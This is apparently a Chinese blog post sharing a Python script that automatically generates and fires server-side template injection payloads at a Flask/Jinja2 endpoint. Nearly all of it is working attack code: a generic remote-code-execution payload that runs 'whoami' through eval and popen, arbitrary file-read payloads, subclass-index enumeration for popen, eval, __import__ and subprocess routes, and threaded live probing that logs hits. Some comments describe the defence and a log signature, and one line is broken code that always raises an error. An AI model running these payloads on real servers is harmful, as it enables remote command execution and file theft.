Python+Flask SSTI 注入payload自动生成
  xIUntf9oR6GI 2023年12月09日 14 0

抛开代码丑不谈,用起来还是挺好用滴。

from flask import Flask, request
from jinja2 import Template
from threading import Thread
import requests
import os

# Target base URL ending in the query parameter under test; every generated
# payload is appended to this string verbatim. 127.0.0.1:5000 is Flask's
# development default, so this presumably points at the author's local test app.
site = "http://127.0.0.1:5000/waewe?404_url="


# One result bucket per payload family. scan() fills them; the main block then
# hands each list to its own check_active() worker thread.
url_dict = {name: [] for name in ("popen", "eval", "__import__", "subprocess")}


# Generic payloads (Python 2 and 3) and two encoding variants of the file read.
# All three iterate []  -> object -> __subclasses__() looking for a class named
# `catch_warnings` and reach the interpreter builtins through its
# __init__.__globals__, so they do not depend on a fixed subclass index the
# way the scan_list entries below do. They are written to result.txt without
# being sent. The defense is the same for every entry here: never compile
# request data as template source (Template(user_input) /
# render_template_string(user_input)); pass it as a variable to a static template.
currency_url = [
    "通用payload_rce: " + site + "{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval(\"__import__('os').popen('whoami').read()\") }}{% endif %}{% endfor %}\n",
    "通用payload_任意文件读取_utf8: " + site + "{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('filename', 'r', encoding='utf-8').read() }}{% endif %}{% endfor %}\n",
    "通用payload_任意文件读取_gbk: " + site + "{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('filename', 'r', encoding='gbk').read() }}{% endif %}{% endfor %}\n"
]

# Python 3 specific payload fragments (the original author notes the
# `__builtins__` route also works on Python 2). Each entry maps the name that
# scan() looks for to a pair: the attribute path that is evaluated on each
# candidate subclass, and the call suffix appended to the generated URL.
# scan() only emits a URL for a subclass whose evaluated path contains the key.
scan_list = {
    "popen": ("__init__.__globals__", "['popen']('whoami').read()"),
    "eval": ("__init__.__globals__['__builtins__']", "['eval'](\"__import__('os').popen('whoami').read()\")"),
    "__import__": ("__init__.__globals__['__builtins__']", "['__import__']('os').system('whoami')"),
    "subprocess": ("__init__.__globals__", "['subprocess'].check_output('whoami', shell=True).decode('gbk')"),
    # "subprocess": ("__init__.__globals__", "['subprocess'].check_output('dir', shell=True).decode('utf8')"),

}

def scan():
    """Enumerate the local interpreter's object subclasses and build candidate URLs.

    Walks ``"".__class__.__base__.__subclasses__()`` in order. For each class
    whose ``__init__.__globals__`` (or its ``__builtins__`` entry) contains one
    of the names in ``scan_list``, a Jinja2 expression that addresses the
    class by its position in that list is appended to ``url_dict``. The
    positions come from the process running this script, so they are
    presumably only meaningful against a target with a matching interpreter
    and import set; check_active() is what filters them.

    Defender's note: every generated expression only does anything when
    attacker-controlled text is compiled as template *source*
    (``Template(...)`` / ``render_template_string(...)``); rendering it as a
    variable of a static template prints it as text.
    """
    for index, cls in enumerate("".__class__.__base__.__subclasses__()):
        try:
            for name, (attr_path, call_suffix) in scan_list.items():
                # eval() walks an attribute/subscript path stored as text in the
                # module-level scan_list; no external input reaches it here.
                if name in eval("cls." + attr_path):
                    url_dict[name].append(
                        "%s{{{}.__class__.__base__.__subclasses__()[%s].%s%s}}\n"
                        % (site, index, attr_path, call_suffix)
                    )
        except:  # noqa: E722 - kept bare to match the original: any class whose
            # __init__ has no __globals__ raises AttributeError and is skipped,
            # but so is everything else, including KeyboardInterrupt.
            continue


def check_active(url, desc):
    """Send each candidate URL and record those that do not answer with a 5xx.

    ``url`` is one list from ``url_dict`` (fully formed request URLs) and
    ``desc`` is the payload family name used as the log label. Every
    candidate is issued as a live GET with no timeout; any status below 500
    (4xx included) is appended to ``result.txt`` as ``利用<desc>: <url>``.
    Exceptions from ``requests.get`` (connection refused, DNS failure) are
    not caught, so they end the calling worker thread with a traceback. The
    main block runs one of these per payload family, so several workers
    append to the same file concurrently.

    Detection note: each probe's query string carries
    ``__class__.__base__.__subclasses__()``, which is a reliable log/WAF
    signature for this technique.
    """
    with open("result.txt", "a", encoding="utf-8") as out:
        for candidate in url:
            code = requests.get(candidate).status_code
            if code < 500:
                out.write("利用" + desc + ": " + candidate)


if __name__ == '__main__':
    print("开始构造.....")
    # Build the candidate URLs from this interpreter's subclass list.
    scan()
    # Start from a clean result file; scan() does not touch it.
    if os.path.exists("result.txt"):
        os.remove("result.txt")

    # The generic payloads are written unverified, before any request is sent.
    with open("result.txt", "a", encoding="utf-8") as f:
        for i in currency_url:
            f.write(i)

    # One worker per payload family; each sends live requests to `site` and
    # appends its hits to result.txt concurrently with the others.
    t_list = []
    for i in url_dict:
        t = Thread(target=check_active, args=(url_dict[i], i,))
        t.start()
        t_list.append(t)

    for t in t_list:
        t.join()
    # NOTE(review): list has no .slice() method, so this line raises
    # AttributeError once the workers have finished. result.txt is already
    # complete at that point, but the closing print below never runs.
    [1,2,3].slice(0,0)

    print("创建完成,请查看当前路径下的 result.txt 文件!!")


